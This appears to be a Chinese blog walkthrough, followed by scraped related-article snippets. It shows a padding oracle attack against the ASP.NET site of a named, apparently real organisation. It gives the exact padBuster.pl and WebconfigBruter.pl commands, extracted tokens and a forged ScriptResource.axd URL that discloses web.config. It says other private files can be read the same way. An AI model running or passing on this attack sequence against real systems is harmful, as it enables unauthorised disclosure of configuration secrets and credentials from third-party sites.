首先关于padding oracle漏洞的原理请看:

步入正传~~

搭建漏洞利用环境Perl

环境下载地址:链接:http://pan.baidu.com/s/1skFxVm1 密码:anuw

首先查看我们目标网站

http://www.hnmatc.org/admin/

然后我们查看页面的源代码

我们翻到如下链接

<script src="/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2&t=635844789308448806" type="text/javascript"></script><script src="/WebResource.axd?d=EmAjXDcDoy8nFp_k_mvjI05whiqnlUaw-CI-p9EFNRQ1&t=635844789308448806" type="text/javascript"></script>

  我们选中复制  构建链接

http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2

然后我们拿出我们的神器padBuster.pl

输入代码

padbuster.pl http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2 cWxcb2PXfUgWzoITVCYtLg2 16 -encoding 3 -plaintext "|||~/web.config"

  稍微等待几分钟。。。

在这里The ID# marked with ** is recommended :我们输入2

跑完之后可以看到密匙  然后再祭出我们的另外一个神器WebconfigBruter.pl

C:\>WebconfigBruter.pl http://www.hnmatc.org/ScriptResource.axd BEKLiGJw9rbsDY8IOiMmTAAAAAAAAAAAAAAAAAAAAAA1 16

  然后继续跑

最后得到源密匙

最终得到密匙为:uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

然后访问地址:http://www.hnmatc.org/ScriptResource.axd?d=uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0

最后   此漏洞不仅仅是可以读取到config文件  大量隐私文件都可以读取

转载于:https://www.cnblogs.com/wh4am1/p/6683393.html

【原创】实战padding oracle漏洞相关推荐

  1. 第5篇 | Shiro Padding Oracle无key的艰难实战利用过程

    ‍ Part1 前言  大家好,上期分享了银行站的一个Java 的SSRF组合洞案例,这期讲讲分享一个Shiro Padding Oracle漏洞利用过程. Shiro反序列化漏洞自16年公布以来,至 ...

  2. 详解ASP.NET的最新安全漏洞,Padding Oracle攻击原理及其他

    微软在9月17日中午正式对外公布了ASP.NET平台下的安全漏洞,即Microsoft Security Advisory (2416728). SecurityFocus上已将此漏洞定义成了&quo ...

  3. Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现

    Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现 环境搭建 安装git 使用dockerfile 启动docker 获取dockerfile 查看是 ...

  4. shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理

    文章目录 1. 前置知识 1.1 shiro550利用条件 原理 1.2 shiro721利用条件 原理 shiro-721对cookie中rememberMe的值的解析过程 1.3 基于返回包的sh ...

  5. Padding Oracle Attack填充提示攻击-渗透测试

    漏洞简介 最近学习了一个shiro的 Critica级漏洞的验证,利用Padding Oracle Vulnerability破解rememberMe Cookie,达到反序列化漏洞的利用,攻击者无需 ...

  6. padding oracle attack相关之padding oracle attack

    前段时间遇到一个挺有意思的题目,用到了padding oracle attack的相关知识,于是恶补了一下padding oracle attack相关内容,本着取之于民用之于民同时也可以方便自己以后 ...

  7. 记录我对Padding Oracle攻击的分析和思考之抄写

    一.相关阅读资料 https://github.com/GDSSecurity/PadBuster PadBuster – Automated script for performing Paddin ...

  8. python从oracle提取数据库_Python编程实战之Oracle数据库操作示例

    本文实例讲述了Python编程实战之Oracle数据库操作.分享给大家供大家参考,具体如下: 1. 要想使Python可以操作Oracle数据库,首先需要安装cx_Oracle包,可以通过下面的地址来 ...

  9. oracle10漏洞补丁下载,Oracle漏洞修复工具

    Oracle漏洞修复工具是一款专业的Oracle数据库修复扫描工具,当Oracle数据库无法打开的时候,我们可以使用该神器直接读取数据文件然后对其进行解析恢复,软件支持修复因各种原因造成的数据库无法打 ...

  10. 一文读懂安全攻防实战、CNVD漏洞平台

    安全的本质是攻防实战.无论是安全研发,还是安全服务,实战才是硬道理.网络安全的学习过程,就是不断在实战演练中积累实操经验的过程. 除了通过开源安全项目学习外,通过在CNVD漏洞平台尝试挖洞是一条高效的 ...

最新文章

  1. python创建只包含一个元素的元组时_Python 创建包含列表的元组
  2. GCC编译过程以及对应FILE文件表
  3. linux上安装activeMQ
  4. 学习ccna,ccnp中如何提高英语问题
  5. 让32位Eclipse和64位Eclipse同是在64的Windows7上运行
  6. pythonchar中的拟合方法_在python中利用numpy求解多项式以及多项式拟合的方法
  7. 需要多快的速度,才能在抽走桌布之后保持桌面物体不掉?
  8. php 实现类,php如何实现类
  9. c语言输出每个数占10列宽,杭州师范大学C语言试题第1套介绍.doc
  10. HBase编程 API入门系列之HTable pool(6)
  11. MyBatis快速将MySQL转换成Oracle语句
  12. Linux之fgrep命令
  13. 关闭迅雷“XLServicePlatform”服务 防止导致Win8假死
  14. 7.微服务设计 --- 测试
  15. 各个浏览器url带参限制
  16. 第二人生的源码分析(11)地面显示的实现
  17. SnakeGame(贪吃蛇游戏)
  18. Mock.js + RAP 使用介绍
  19. 微信小程序连接emqx服务器实现数据交互
  20. 虾皮物流怎么收费?收费标准是什么?

热门文章

  1. 有名内部类和匿名内部类的用法
  2. vue element 调用后台下载文件
  3. php 数据访问框架,PHP Ice框架数据库访问层- Ice Framework(PHP Web开发框架)
  4. java单链表上的选择排序_《Java数据结构和算法》简单排序选择排序
  5. python判断数字和字母切换_Python判断字符串是否为字母或者数字(浮点数)的多种方法...
  6. jquery mysql php_PHP+jQuery+MySQL来实现一个在线测试项目
  7. 针式打印机打印发虚_针式打印机使用技巧
  8. PTA甲级15进制转换
  9. ES(Elasticsearch)更改字段索引
  10. TestLink 测试/测试用例使用